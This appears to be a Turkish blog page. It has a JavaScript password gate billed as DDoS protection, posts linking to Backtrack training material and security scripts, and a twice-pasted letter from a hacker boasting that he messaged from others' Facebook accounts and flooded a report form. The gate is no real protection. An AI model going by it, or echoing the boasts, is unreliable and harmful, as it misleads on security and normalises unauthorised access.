<!DOCTYPE HTML><style type="text/css">div.enenene{position:fixed;text-align:center;z-index:6201;}div.dgfdgd{top:0px;left:0px;width:100%;height:100%;background-color:#323232;}</style><style type="text/css">div.enenene{_position:absolute;}div.dgfdgd{_bottom:auto;_top:expression(ie6=(document.documentElement.scrollTop+document.documentElement.clientHeight - 52+"px") );}</style><div class="enenene dgfdgd" id="engel"></div>
<script language="Javascript">
<!--
var password = "aktif-frm"
var x = prompt("DDos - Bot Koruması == Şifre aktif-frm","")
if (x.toLowerCase() == password) {
alert("Şifre doğru \n \n Sayfaya girmek için Tamam'a tıklayın");
document.getElementById('engel').style.display='none';
}
else {
alert("Hoops Man ! Şifre Yanliş Nereye Gidiyon.. ");
location = "/"
}
//-->
</script>
<HTML>
<HEAD>
<BODY>
<TITLE>aktif-frm.net</TITLE>
<meta name="description" content="aktif-frm.net">
<BODY BGCOLOR="black">
<FONT COLOR="white"><center><FONT SIZE="5">Aktif-FRM Hoşgeldiniz..</FONT></center></FONT>
<br>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7Uc2wozWFlL_EmpA5LdQn8s8d8uUTXYfNNLzJKHnfb0pdGKwwmBvHCJnzW-AYb2DDxW-e8ZdxpOvEnfyFrvbUimG7VfDnSaVXWrVw1GU89EJCBwLjGz75X2csXfoB7BtW5zZAL17QjP7j/s1600/koddostu.gif" alt="türkbayrağı" border="0" style="padding:none;border:none;background-color:transparent;"/></center>
</br>
<br>
<br>
<br>
<br>
<br>
<br>
<center><a href="index.php"><img src="http://aktif-frm.net/images/aktif-mavi/logo.png" <a></center>
<br>
<FONT COLOR="white"><center><FONT SIZE="5">Foruma Gitmek İçin Resime Tıklamanız Yeterli Olucaktır..</FONT></center></FONT>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
<FONT COLOR="white"><center><FONT SIZE="4"><a href="http://siteneeklekodlari.blogspot.com/2012/01/sitene-ip-adresi-gorme-kodu.html" target="_blank">İp Numaralarınız Kayit Altına Alınmaktadır</a>
<script type="text/javascript">
//<![CDATA[
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:1386240590,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/acv=4125811108/"},atok:"a4c5b7deace613b543535eb6937ad16b",petok:"f9711a81bb0ab23cda74017e299685dffdf31c36-1386830278-1800",zone:"aktif-frm.net",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"89aea5120c6c2504a41c9ffe5c7fc88d"}});var a=document.createElement("script"),b=document.getElementsByTagName("script")[0];a.async=!0;a.src="//ajax.cloudflare.com/cdn-cgi/nexp/acv=616370821/cloudflare.min.js";b.parentNode.insertBefore(a,b);}}catch(e){};
//]]>
</script>
<script type="text/javascript" src="http://www.ip-numaram.com/remoteip.php"></script><noscript><a href="http://siteneeklekodlari.blogspot.com/2012/01/sitene-ip-adresi-gorme-kodu.html">İp Numaralarınız Kayit Altına Alınmaktadır.</a></noscript></FONT></center></FONT>
</BODY>
</HEAD>
</HTML>
3 Mayıs 2014 Cumartesi
DDoS Ve Bot Korumalı Giriş Scripti
Etiketler:
güvenlik
,
hosting
,
internet
,
php
,
scripts
,
sourcecodes
,
web-güvenlik
,
web-programlama
,
webmaster
16 Haziran 2014 Pazartesi
Kullanıcı adınızı başka kimler kullanıyor ?
Sanal alemde favori nick'inizin hangi sitelerde alınmış durumda olduğunu öğrenmenin en kolay yolu Namechk. Web üzerinden kullanabileceğiniz bir servis olan Namechk, girdiğiniz kullanıcı adının hangi sitelerde mevcut olup olmadığını tespit edebiliyor. Siz de hemen bu sayfadan istediğiniz kullanıcı adının hangi servislerde alındığını görebilirsiniz.
BURADAN
Backtrack 5 Eğitim Seti
Nedir Bu Backtrack 5 ?
Backtrack Nedir ?
Backtrack pentest çalışmaları yapmak için geliştirilmiş olan linux dağıtımı diyebiliriz.Bilişim güvenli uzmanları,sistem ve ag yöneticilerine yönelik olarak geliştirilmiştir.
Ne İçin Kullanılır ?
Bilgi toplama,Wireless Şifre Kırma,Ag analizi,Zayıflık taraması,Raporlama ,Adli Bilişim gibi işlemler için kullanılır.
Geldik Eğitim Setine.


Linkler.
1- http://turbobit.net/xcpmsydg07qt.html
2- https://cloud.mail.ru/public/d05f7b0...ti.Turkcec.rar
Premium Link
http://ultiod.net/bbcode/?id=53c4bd84a6
Backtrack Nedir ?
Backtrack pentest çalışmaları yapmak için geliştirilmiş olan linux dağıtımı diyebiliriz.Bilişim güvenli uzmanları,sistem ve ag yöneticilerine yönelik olarak geliştirilmiştir.
Ne İçin Kullanılır ?
Bilgi toplama,Wireless Şifre Kırma,Ag analizi,Zayıflık taraması,Raporlama ,Adli Bilişim gibi işlemler için kullanılır.
Geldik Eğitim Setine.
| This image has been resized.Click to view original image |
| This image has been resized.Click to view original image |
Linkler.
1- http://turbobit.net/xcpmsydg07qt.html
2- https://cloud.mail.ru/public/d05f7b0...ti.Turkcec.rar
Premium Link
http://ultiod.net/bbcode/?id=53c4bd84a6
25 Nisan 2014 Cuma
Güvenlik Scriptleri
Dhn Rastgele Şifre Oluşturma v1.0 :
Bu script ile rastgele şifreler oluşturabilirsiniz.Şifre oluşturma tipleri : sadece harf,sadece rakam,harf-rakam,harf-rakam-karakter.
--Kurulum--
-Dosyaları ftp den sitenize atın
-Daha sonra dilediğiniz gibi kullanın.
İNDİR
Dhn Tüm Şifreleme Algoritmaları v1.0 :
En iyi ve en güçlü şifreleme algoritmalarını bu script ile kolaylıkla oluşturup kullanabilirsiniz.16 adet şifreleme algoritması vardır.Bunlar md5,sha1,crc32,base64,sha224,sha256,sha384,sha512, ripemd128,ripemd160,ripemd256,ripemd320
whirlpool,salsa10,salsa20 ve son olarakta HAVAL256,5.Hepsini kolaylıkla kullanabilirsiniz.Çevirirken sayfayı yenilemez.
İNDİR
Kent Sha1 ve Md5 Hesaplama Scripti :
Güvenlik ( md5 ve Sha1) Şifreleme Scripti
İNDİR
Eladmin Güvenlik Kodu Scripti :
Kendi fontunuzu ve arkaplanınızı rahatlıkla kullanabileceğiniz bir güvenlik kodu scripti.Bu script ile formlarınızı daha güvenli bir hale getirebilirsiniz.
İNDİR
ScottConnell Şifre Korumalı Sayfa Scripti
Basit projelerinizde kullanabileceğiniz ufak bir şifre korumalı scriptidir.
Admin giriş şifresi admin dir. Bu şifreyi indireceğiniz klasörde admin_login.php dosyasının içinden değiştirebilirsiniz.
Scriptin şifre sorma sayfası aşağıdaki gibidir.
| This image has been resized.Click to view original image |
İNDİR
IPdistance IP Gösterme Scripti :
Whastmyip ipadresimne tarzı projelerin sunduğu hiznmeti kendi siteizin içinden bu script ile verebilirsiniz.
İp adresi,Bilgisayarın hostname adresi ve bulunduğunuz ülke ve şehiri gösterebiliyor.
İNDİR
Anti Flood Scripti :
Sitenizde bir kullanıcı kısa bir süre içinde bir çok istek yapabilir.Sitenizde warning: too many connections hatasını görebilirsiniz.Bu çok yaygın bir sorundur.
Bu scripti mysql bağlantınızın yada index kodlarınızın en üstüne yapıştırın / veya include edin.
Böyle bir durum olduğunda script kullanıcıyı flood.html e yönlendirerek kullanıcıyı uyaracak.
İNDİR
Webtoolbag Güvenlik Kodu Scripti:
Sitenizin form bölümlerine entegre edebileceğiniz bir güvenlik kodu uygulaması.Sıradan güvenlik kodlarından biraz farkı bulunuyor.
Script oluşturduğu güvenlik kodlarında matematiksel işlemleri sorarak kullanıcıdan bunu yanıtlamasını isteyebiliyor.
İNDİR
HS Resim Doğrulama Scripti :
Gayet kullanımlı bir Resim Doğrulama Scripti.
İNDİR
3 Mayıs 2014 Cumartesi
Mark Zuckerberg’in mesaj kutusuna giren Türk Hacker’ın İlginç Mektubu
Doğukan isimli Türk hacker, dünyanın en büyük sosyal ağ sitesi Facebook’un kurucusu Mark Zuckerberg’in mesaj kutusuna girdi, bakın neler yaptı?
İŞTE DOĞUKAN’IN MEDYAFARESİ.COM’A GÖNDERDİĞİ MEKTUP…
2 ay önce (8 ay oldu) kuzenim kalp amelliyatı geçirdi. kendisi 14 yaşında ve kalp pili takıldı. Kuzenim amelliyata girmeden önce “bana laptop alırsanız amelliyat olurum” demişti. ben de ona amelliyat olursa eğer laptop alacağımı söylemiştim. ertesi gün facebook’a girdiğimde, facebook sitesinin açıklarını bulana 500$ para ödülü verildiğini duydum ve bunun yanında açıklarını bulanların adlarını sitelerinde yayınlayacaklardı. Ben de fırsattan istifade hemen bu etkinliğe katıldım. Zaten facebook’un açıklarını biliyordum fakat düzeltirler diyerekten geçiştiriyordum. Bu sayede kuzenime laptop alabilmek için elime çok güzel bir fırsat geçmişti. Hemen facebook’a bildiğim ilk açığı ihbar ettim. Açık şu şekildeydi, kişiler beni fotoğraf albümlerini görmemem için engellemelerine rağmen ben facebook mobile app. aracılığıyla kişinin fotoğraf albümlerine girip, resimleri görüntüleyip, beğenip, yorum yazabiliyordum. Bunu facebook’a ilettim. dört gün sonra cevap geldi. Bununla ilgili ekran görüntüsü göndermemi istediler. ben de tam ekran görüntüsü alacağım sırada bir baktım ki açık düzeltilmiş. Onlara: “bunu siz mi düzettiniz?” gibi sorular sormadan, tekrar facebook’u incelemeye aldım. Bu sırada çok çok daha büyük bir açık buldum! Bu açık şu şekilde işliyordu. Kişiler, kendilerini kimse görmesin diye profillerini gizledikleri halde profilleri açılabiliyor. Bu sayede gizlilik ilkesi ihlal oluyordu. Açık sadece bununla bitmiyor. En can alıcısı ise, kişiler kendilerini arkadaş olarak eklenmesinler diye, “arkadaş ekle” tuşunu kapatmalarına rağmen, kişileri arkadaş olarak ekleyebiliyordum ve son olarak da aynı şekilde, kişiler kendilerine mesaj gönderilmemesi için mesaj gönderme tuşunu kapatmalarına rağmen kişilere mesaj gönderebiliyorum. bunların hepsi tamamıyla çok büyük güvenlik ve gizlilik açıkları. Bunların gerçekleştiği anların video kayıtlarını aldım ve bu video kayıtlarıyla birlikte facebook’a gönderdim. İki ay olacak açıklardan bazılarını düzelttiler. arkadaş olarak ekleme açığını da düzelttiler fakat bana bunu nasıl yaptığımı soruyorlar. 2 ay oldu ve hala bunu nasıl yaptığımı çözemedi koskoca facebook. Adımı artık listede yazmalarını ve verdikleri ödül sözünü gerçekleştirmeleri için sitem edercesine bir e-mail gönderdim. Bana henüz bunu yapamayacaklarını ve gerekçe olarak da “bunu nasıl yaptığımı hala çözemedikleri” olduğunu söylediler. Eğer bunu nasıl yaptığımı çözebilirlerse, ondan sonra bana geri dönüş yapabileceklerini söylediler. Bu 2 aylık süre içerisinde benden başka 14 kişinin daha adını listeye yazdılar. Ama benim adım yazılmadı. Koskoca Facebook’un en büyük açıklarını buluyorum ve bunları kapatmaları için yardımcı oluyorum ama bana yapılana bakın. En son olarak kendileri bu işi çözemeyince beni Facebook Türkiye’ye yönlendirdiler. Facebook Türkiye’den de gelen e-mail neredeyse aynıydı tek fark bu sefer mailin içeriğinin Türkçe oluşuydu. Bana bu mailde de bunu nasıl yapabildiğimi sordular ve ben onlara da söylemedim. yarım saatlik bir video kaydı var. onu iyice izleyin dedim. bulamazsanız bari mark zuckerberg’e sorun dedim….
Bulduğum açıklar:
mobil facebook uygulaması sayesinde gizlenmiş fotoğraf albümlerini açmak, o albümlere ve resimlere yorum yazıp, beğenmek.
ilk olarak bunu facebook’a bildirdim ve bunu düzelttiler.
bu açık sayesinde gizlilik ilkesi hiçe sayılarak kişilerin “gizlediklerini sandıkları” resimlerini ve albümlerini görebiliyoruz.
–ikincisi kullanıcı kendini “başkaları tarafından bulunmamak için” gizlemesine rağmen o kişiyi bulabiliyorum.
Bu sayede “arama motorunda ve facebook’da bulunamayacağını düşünen kişilerin” hesapları sanki hiç gizlenmemiş gibi ortaya çıkıyor.
ve bu kişileri bu sayede tabiri caizse sobelemiş oluyorum, arkadaşlık isteği ve mesaj gönderebiliyorum.
facebook bunu henüz düzeltemedi…
–üçüncü açık ise, “arkadaş olarak ekle tuşu” kapatılmış olmasına rağmen o kişiyi arkadaş olarak ekleyebiliyorum.
bunu videoya kaydettim ve facebook’a bunu da bildirdim. bunu da düzelttiler ve onlar düzeltirlerken o an’ı da videoya kaydettim ve ekran görüntüsü aldım.
–bu maddede söyleyeceğim tam bir açık olarak sayılmasa da bir hata diyebiliriz.
Mobil facebook adresinden kişiye mesaj göndereceğiniz zaman gönder yerine mesaj göndermemek için iptal’e basmanıza rağmen mesaj yine de o kişiye gidiyor.
bu sayede, bu durumu bilmeyen biri, yanlış bir içerik yazdıysa eğer veya yanlış kişiye gönderecekse mesajı iptal ettiği halde mesaj o kişiye gidip bir sorun teşkil edebilir.
–bir diğer facebook açığı ise: kişiyi size mesaj göndermemesi için engelleseniz dahi, engellenenler listesine alsanız dahi o kişi size mesaj göndermeye devam ediyor.
işin garip tarafı bu sefer siz ona karşılık vermek için mesaj gönderemiyorsunuz, o kişiyi engellediğiniz için…
bu kişileri gerçekten büyük sıkıntıya sokabilir.
–ve son olarak en can alıcı facebook açığı:
istediğim facebook kullanıcısın hesabı ile istediğim facebook kullanıcısına facebook üzerinden mesaj gönderebiliyorum.
bu bilgi kötü insanların eline geçerse şöyle söyleyeyim mesela küs olan iki milletvekilinin facebook hesaplarını kullanarak birbirlerine kötü içerikli mesajlar gönderir (bu açığı kullanarak)
ve bu iki milletvekili arasında büyük bir sorun olabilir. bu en küçük ihtimal.
ben milletvekillerinin kendi kullandıkları facebook hesaplarını kullandım ve kendime mesaj gönderdim.
o milletvekillerinin haberi dahi olmuyor kendi facebook adreslerinden mesaj gönderildiğinden.
bunu toplu olarak da yapabiliyorum. aynı anda kişiden toplu olarak da mesaj gönderebiliyorum. mesela aynı anda 5 kişiye veya daha fazlasına…
–sadece milletvekilleri değil, dediğim gibi facebook’daki herhangi bir kullanıcının hesabından mesaj gönderebiliyorum.
bunlar; üniversite rektörleri, gazeteciler, ünlüler ve aklınıza gelebilecek herkes olabilir…
facebook’a bunu 100’lerce kez ilettim. Bakın şu şu açıklarınız var dedim. bırakın yazı yazmayı, resim göndermeyi, resmen 10’larca dakikalık video gönderdim nasıl yaptığıma dair,
hâlâ düzeltmiyorlar ve bir tedbir almıyorlar. Facebook açıklarını bulan kişileri ödüllendireceğini söyledi ve ben de bu işe başkoydum. ödül ise açık başına 500$ vereceklerini
ve kişilerin isimlerini facebook sayfalarında yazacaklarını söylediler. ben de o kadar açık bulmama rağmen ve bunları onlara söylememe rağmen ve hatta onların bu açıkların birkaçını düzeltmelerine rağmen
bana ne para ödülümü verdiler ne de adımı sayfalarında yazdılar.
facebook ile konuşmalarımızın hepsi bende kayıtlı.
bana bunları nasıl yaptığımı tam olarak anlatmamı istediler, anlatmadım. sonra beni facebook Türkiye’den safiye hanım’a yönlendirdiler. o da bana sordu bunları nasıl yaptığımı…
ben de Türk birini bulunca ağzıma geleni söyledim Türkçe olarak. Çünkü 1 ay olmuştu ve resmen beni hem oyalıyorlardı hem de benimle dalga geçiyorlardı.
o kadar uzun bir e-mail attım ki ona, sanki o kadar uzun e-maili yazan ben değilmişim gibi bana sadece kısa bir mesaj daha gönderdi o e-mailime cevap olarak ve yeniden nasıl yaptığımı sordu…
ben yine söylemedim. adımı yazın dedim!!! o kadar şey yaptım hâlâ adımı yazmadınız dedim!!! sonra bir daha safiye hanımdan mesaj geldi.
açıkları nasıl yaptığımı söylemediğim için bunu saymadıklarını, buna benzer bir mesaj ile söyledi…
2 ay oldu hâlâ sinirim yatışmadı! Milliyet’te haberim yayınlandı, çok ama çok mutlu oldum.
Birilerinin bunu gerçekten onayladığını bilmek beni gerçekten çok mutlu etti….
BENİM HÂLÂ İSTEĞİM ORDA ADIMIN YAZMASI !!! PARALARI ONLARIN OLSUN !!! BEN HÂLÂ ORAYA ADIMI YAZMALARINI VE ADIMI ORDA GÖRMEYİ ÇOK AMA ÇOK İSTİYORUM..!!!!
bana gönderdikleri en son e-mail şuydu:
You will not be on the whitehat page or get any money.
kısacası bu kadar, ekran görüntüleri de ekleyeceğim birazdan bu e-mail’e. (ekledim)
bu adreste de açıkların videolarını bulup izleyebilirsiniz:
http://www.youtube.com/dgkn01#p/u sağ taraftaki listede tüm açık videoları mevcut.
bu videoda gizli kişinin hesabını açma ve “arkadaş olarak ekle” tuşu kapalı olsa dahi o kişiyi arkadaş olarak ekleme açığı var:
bu videoda da facebook yapımcılarının hesaplarından kendime gönderdiğim mesajların videosu:http://www.youtube.com/user/dgkn01#p/u/8/xtofImMI8uM
Milliyet’in haberinden sonra çoğu internet haber sitesi bu haberi: “Facebook’u dize getiren Türk’ün inanılmaz öyküsü!” adlı başlık ile haber yapmış…
aslında bu kadar açığa nasıl ulaştığımı, bu yola nerden girdiğimi gerçekten bilseler, çok çok daha inanılmaz bir öykü olduğunu anlarlardı…
kuzenim kalp ameliyatı oldu. kendisi daha 14 yaşında ve ameliyata girmeden önce: “bana laptop alın, ben de ameliyata girerim” dedi.
kendine moral olsun diye bunu söyledi, bunu bizden istedi. ben de söz verdim ona… sözümüze de güvenerek ameliyat oldu. 2 hafta hastanede yattı.
tam da ameliyata girdiği gün, facebook’un açıklarını bulana para ödülü verdiğini öğrendim ve hemen kolları sıvadım.
bu olaylardan önce de facebook’un açıklarını biliyordum ve facebook çalışıyor, düzeltirler diye geçiştiriyordum kendi kendime…
bu etkinliği de öğrenince hemen bulduğum ilk açığı onlara ilettim. tam 4 gün sonra cevap geldi facebook’dan…
“bir kez daha kontrol eder misiniz? ekran görüntüsü gönderin” dediler. ben de cevap geldiğine sevindim ve hemen açığa baktım yeniden.
bir de ne göreyim..!! benim onlara ihbar ettiğim açığı düzeltmişler resmen!!!
“bunu siz mi yaptınız?” gibi mesajlar yazmadan, araştırmaya devam ettim…
ve ardından işte size bahsettiğim bu kadar açığı buldum…
kuzenim için bu yola başkoydum… ama facebook sağolsun… ne kadar ilginç bir şirketmiş…
resmen beni madur etti… bu kadar şeye rağmen resmen beni madur etti!!!
bu konuda bana yardımcı olursanız çok mutlu olacağım.
facebook’un aslında “GERÇEKTEN NE KADAR TEHLİKELİ” bir ortam olduğunu
ve istenildiği zaman kişilerin gizlilik ve güvenlik ilkelerini ihlal edip, özel hayatlarını hiç’e sayıp, gizlisini saklısını 3’üncü kişilere sunan bir kuruluş olan facebook’un,
bu durumunu ve insanların başlarına neler gelebileceklerini bilmelerini istiyorum.
bunlar da diğer detaylar ve gelişmeler:
—- “Sofistike Aşık” facebook’da kullandığım ismimdi. gerçek adımı kullanmıyordum. (youtubeda açıkların videosundaki görünen ismim de bu)
bu açıkları bulduğum ve onlara ihbar ettiğim süre içinde de hep bu ismi kullandım.
facebook’un bana yaptıklarından sonra açık ihbar etme sayfasının dahi açığını bularak, aynı mesajı yaklaşık 8000 kere gönderdim. onlar ise karşılık olarak sadece 60 adet gönderebilmişlerdi.
ve kesin olarak işte o an dediler, ne para ödülünü alabileceğimi ve ne de adımın yazılacağını. bu olaydan sonra da kullandığım “Sofistike Aşık” ismimi kara listeye aldılar.
bu ismi şu anda kimse facebook üzerinde tekrardan alamıyor. ben de dahil. tıpkı ünlülerin isimleri gibi. bu isimle yeni kayıt yapılamıyor…
—-Mark Zuckerberg (facebook’un yapımcısı) onun hesabını kullandığımı öğrenince, facebook’a giriş yaptığı 3 e-mail adresinden, benim kullanmış olduğumu kaldırdı.
Mark’a e-mail adresini kapattırttım. kendi hesabından arkadaşlarının yanı sıra, sevgilisine ve annesine dahi mesaj gönderdim.
—–Facebook’un diğer yapımcılarından olan Marcel Laverdet’ın da hesabını kullandım ve onlardan hakkımı talep ettiğim için beni beni herhangi bir kullanıcı gibi engelledi.
kendi açtığı grupları ve etkinlikleri bulup, oraya yorum bırakıyordum. en sonunda benimle baş edemedi ve çareyi beni engellemekte buldu.
—–normalde bu yaptıklarımdan dolayı beni çoktan facebook’dan engellemiş olmaları lazımdı, facebook hesabımı kapatmış olmaları gerekiyordu fakat ben her bulduğum açığı yayınladığım için benim hesabımı kapatamıyorlar. beni takip ediyorlar, ne yaptığımı inceliyorlar. bu yüzden hala facebook hesabım açık durumda, sadece “Sofistike Aşık” ismini kullanamıyorum…
en son gelişmeler bunlar ve ben hala sadece adımın orda yazılmasını istiyorum. tek istediğim bu, para dahi istemiyorum. sadece adımı whitehat sayfalarına yazsınlar yeter…
İşte Facebook'u İnleten Türk.
İŞTE DOĞUKAN’IN MEDYAFARESİ.COM’A GÖNDERDİĞİ MEKTUP…
2 ay önce (8 ay oldu) kuzenim kalp amelliyatı geçirdi. kendisi 14 yaşında ve kalp pili takıldı. Kuzenim amelliyata girmeden önce “bana laptop alırsanız amelliyat olurum” demişti. ben de ona amelliyat olursa eğer laptop alacağımı söylemiştim. ertesi gün facebook’a girdiğimde, facebook sitesinin açıklarını bulana 500$ para ödülü verildiğini duydum ve bunun yanında açıklarını bulanların adlarını sitelerinde yayınlayacaklardı. Ben de fırsattan istifade hemen bu etkinliğe katıldım. Zaten facebook’un açıklarını biliyordum fakat düzeltirler diyerekten geçiştiriyordum. Bu sayede kuzenime laptop alabilmek için elime çok güzel bir fırsat geçmişti. Hemen facebook’a bildiğim ilk açığı ihbar ettim. Açık şu şekildeydi, kişiler beni fotoğraf albümlerini görmemem için engellemelerine rağmen ben facebook mobile app. aracılığıyla kişinin fotoğraf albümlerine girip, resimleri görüntüleyip, beğenip, yorum yazabiliyordum. Bunu facebook’a ilettim. dört gün sonra cevap geldi. Bununla ilgili ekran görüntüsü göndermemi istediler. ben de tam ekran görüntüsü alacağım sırada bir baktım ki açık düzeltilmiş. Onlara: “bunu siz mi düzettiniz?” gibi sorular sormadan, tekrar facebook’u incelemeye aldım. Bu sırada çok çok daha büyük bir açık buldum! Bu açık şu şekilde işliyordu. Kişiler, kendilerini kimse görmesin diye profillerini gizledikleri halde profilleri açılabiliyor. Bu sayede gizlilik ilkesi ihlal oluyordu. Açık sadece bununla bitmiyor. En can alıcısı ise, kişiler kendilerini arkadaş olarak eklenmesinler diye, “arkadaş ekle” tuşunu kapatmalarına rağmen, kişileri arkadaş olarak ekleyebiliyordum ve son olarak da aynı şekilde, kişiler kendilerine mesaj gönderilmemesi için mesaj gönderme tuşunu kapatmalarına rağmen kişilere mesaj gönderebiliyorum. bunların hepsi tamamıyla çok büyük güvenlik ve gizlilik açıkları. Bunların gerçekleştiği anların video kayıtlarını aldım ve bu video kayıtlarıyla birlikte facebook’a gönderdim. İki ay olacak açıklardan bazılarını düzelttiler. arkadaş olarak ekleme açığını da düzelttiler fakat bana bunu nasıl yaptığımı soruyorlar. 2 ay oldu ve hala bunu nasıl yaptığımı çözemedi koskoca facebook. Adımı artık listede yazmalarını ve verdikleri ödül sözünü gerçekleştirmeleri için sitem edercesine bir e-mail gönderdim. Bana henüz bunu yapamayacaklarını ve gerekçe olarak da “bunu nasıl yaptığımı hala çözemedikleri” olduğunu söylediler. Eğer bunu nasıl yaptığımı çözebilirlerse, ondan sonra bana geri dönüş yapabileceklerini söylediler. Bu 2 aylık süre içerisinde benden başka 14 kişinin daha adını listeye yazdılar. Ama benim adım yazılmadı. Koskoca Facebook’un en büyük açıklarını buluyorum ve bunları kapatmaları için yardımcı oluyorum ama bana yapılana bakın. En son olarak kendileri bu işi çözemeyince beni Facebook Türkiye’ye yönlendirdiler. Facebook Türkiye’den de gelen e-mail neredeyse aynıydı tek fark bu sefer mailin içeriğinin Türkçe oluşuydu. Bana bu mailde de bunu nasıl yapabildiğimi sordular ve ben onlara da söylemedim. yarım saatlik bir video kaydı var. onu iyice izleyin dedim. bulamazsanız bari mark zuckerberg’e sorun dedim….
Bulduğum açıklar:
mobil facebook uygulaması sayesinde gizlenmiş fotoğraf albümlerini açmak, o albümlere ve resimlere yorum yazıp, beğenmek.
ilk olarak bunu facebook’a bildirdim ve bunu düzelttiler.
bu açık sayesinde gizlilik ilkesi hiçe sayılarak kişilerin “gizlediklerini sandıkları” resimlerini ve albümlerini görebiliyoruz.
–ikincisi kullanıcı kendini “başkaları tarafından bulunmamak için” gizlemesine rağmen o kişiyi bulabiliyorum.
Bu sayede “arama motorunda ve facebook’da bulunamayacağını düşünen kişilerin” hesapları sanki hiç gizlenmemiş gibi ortaya çıkıyor.
ve bu kişileri bu sayede tabiri caizse sobelemiş oluyorum, arkadaşlık isteği ve mesaj gönderebiliyorum.
facebook bunu henüz düzeltemedi…
–üçüncü açık ise, “arkadaş olarak ekle tuşu” kapatılmış olmasına rağmen o kişiyi arkadaş olarak ekleyebiliyorum.
bunu videoya kaydettim ve facebook’a bunu da bildirdim. bunu da düzelttiler ve onlar düzeltirlerken o an’ı da videoya kaydettim ve ekran görüntüsü aldım.
–bu maddede söyleyeceğim tam bir açık olarak sayılmasa da bir hata diyebiliriz.
Mobil facebook adresinden kişiye mesaj göndereceğiniz zaman gönder yerine mesaj göndermemek için iptal’e basmanıza rağmen mesaj yine de o kişiye gidiyor.
bu sayede, bu durumu bilmeyen biri, yanlış bir içerik yazdıysa eğer veya yanlış kişiye gönderecekse mesajı iptal ettiği halde mesaj o kişiye gidip bir sorun teşkil edebilir.
–bir diğer facebook açığı ise: kişiyi size mesaj göndermemesi için engelleseniz dahi, engellenenler listesine alsanız dahi o kişi size mesaj göndermeye devam ediyor.
işin garip tarafı bu sefer siz ona karşılık vermek için mesaj gönderemiyorsunuz, o kişiyi engellediğiniz için…
bu kişileri gerçekten büyük sıkıntıya sokabilir.
–ve son olarak en can alıcı facebook açığı:
istediğim facebook kullanıcısın hesabı ile istediğim facebook kullanıcısına facebook üzerinden mesaj gönderebiliyorum.
bu bilgi kötü insanların eline geçerse şöyle söyleyeyim mesela küs olan iki milletvekilinin facebook hesaplarını kullanarak birbirlerine kötü içerikli mesajlar gönderir (bu açığı kullanarak)
ve bu iki milletvekili arasında büyük bir sorun olabilir. bu en küçük ihtimal.
ben milletvekillerinin kendi kullandıkları facebook hesaplarını kullandım ve kendime mesaj gönderdim.
o milletvekillerinin haberi dahi olmuyor kendi facebook adreslerinden mesaj gönderildiğinden.
bunu toplu olarak da yapabiliyorum. aynı anda kişiden toplu olarak da mesaj gönderebiliyorum. mesela aynı anda 5 kişiye veya daha fazlasına…
–sadece milletvekilleri değil, dediğim gibi facebook’daki herhangi bir kullanıcının hesabından mesaj gönderebiliyorum.
bunlar; üniversite rektörleri, gazeteciler, ünlüler ve aklınıza gelebilecek herkes olabilir…
facebook’a bunu 100’lerce kez ilettim. Bakın şu şu açıklarınız var dedim. bırakın yazı yazmayı, resim göndermeyi, resmen 10’larca dakikalık video gönderdim nasıl yaptığıma dair,
hâlâ düzeltmiyorlar ve bir tedbir almıyorlar. Facebook açıklarını bulan kişileri ödüllendireceğini söyledi ve ben de bu işe başkoydum. ödül ise açık başına 500$ vereceklerini
ve kişilerin isimlerini facebook sayfalarında yazacaklarını söylediler. ben de o kadar açık bulmama rağmen ve bunları onlara söylememe rağmen ve hatta onların bu açıkların birkaçını düzeltmelerine rağmen
bana ne para ödülümü verdiler ne de adımı sayfalarında yazdılar.
facebook ile konuşmalarımızın hepsi bende kayıtlı.
bana bunları nasıl yaptığımı tam olarak anlatmamı istediler, anlatmadım. sonra beni facebook Türkiye’den safiye hanım’a yönlendirdiler. o da bana sordu bunları nasıl yaptığımı…
ben de Türk birini bulunca ağzıma geleni söyledim Türkçe olarak. Çünkü 1 ay olmuştu ve resmen beni hem oyalıyorlardı hem de benimle dalga geçiyorlardı.
o kadar uzun bir e-mail attım ki ona, sanki o kadar uzun e-maili yazan ben değilmişim gibi bana sadece kısa bir mesaj daha gönderdi o e-mailime cevap olarak ve yeniden nasıl yaptığımı sordu…
ben yine söylemedim. adımı yazın dedim!!! o kadar şey yaptım hâlâ adımı yazmadınız dedim!!! sonra bir daha safiye hanımdan mesaj geldi.
açıkları nasıl yaptığımı söylemediğim için bunu saymadıklarını, buna benzer bir mesaj ile söyledi…
2 ay oldu hâlâ sinirim yatışmadı! Milliyet’te haberim yayınlandı, çok ama çok mutlu oldum.
Birilerinin bunu gerçekten onayladığını bilmek beni gerçekten çok mutlu etti….
BENİM HÂLÂ İSTEĞİM ORDA ADIMIN YAZMASI !!! PARALARI ONLARIN OLSUN !!! BEN HÂLÂ ORAYA ADIMI YAZMALARINI VE ADIMI ORDA GÖRMEYİ ÇOK AMA ÇOK İSTİYORUM..!!!!
bana gönderdikleri en son e-mail şuydu:
You will not be on the whitehat page or get any money.
kısacası bu kadar, ekran görüntüleri de ekleyeceğim birazdan bu e-mail’e. (ekledim)
bu adreste de açıkların videolarını bulup izleyebilirsiniz:
http://www.youtube.com/dgkn01#p/u sağ taraftaki listede tüm açık videoları mevcut.
bu videoda gizli kişinin hesabını açma ve “arkadaş olarak ekle” tuşu kapalı olsa dahi o kişiyi arkadaş olarak ekleme açığı var:
bu videoda da facebook yapımcılarının hesaplarından kendime gönderdiğim mesajların videosu:http://www.youtube.com/user/dgkn01#p/u/8/xtofImMI8uM
Milliyet’in haberinden sonra çoğu internet haber sitesi bu haberi: “Facebook’u dize getiren Türk’ün inanılmaz öyküsü!” adlı başlık ile haber yapmış…
aslında bu kadar açığa nasıl ulaştığımı, bu yola nerden girdiğimi gerçekten bilseler, çok çok daha inanılmaz bir öykü olduğunu anlarlardı…
kuzenim kalp ameliyatı oldu. kendisi daha 14 yaşında ve ameliyata girmeden önce: “bana laptop alın, ben de ameliyata girerim” dedi.
kendine moral olsun diye bunu söyledi, bunu bizden istedi. ben de söz verdim ona… sözümüze de güvenerek ameliyat oldu. 2 hafta hastanede yattı.
tam da ameliyata girdiği gün, facebook’un açıklarını bulana para ödülü verdiğini öğrendim ve hemen kolları sıvadım.
bu olaylardan önce de facebook’un açıklarını biliyordum ve facebook çalışıyor, düzeltirler diye geçiştiriyordum kendi kendime…
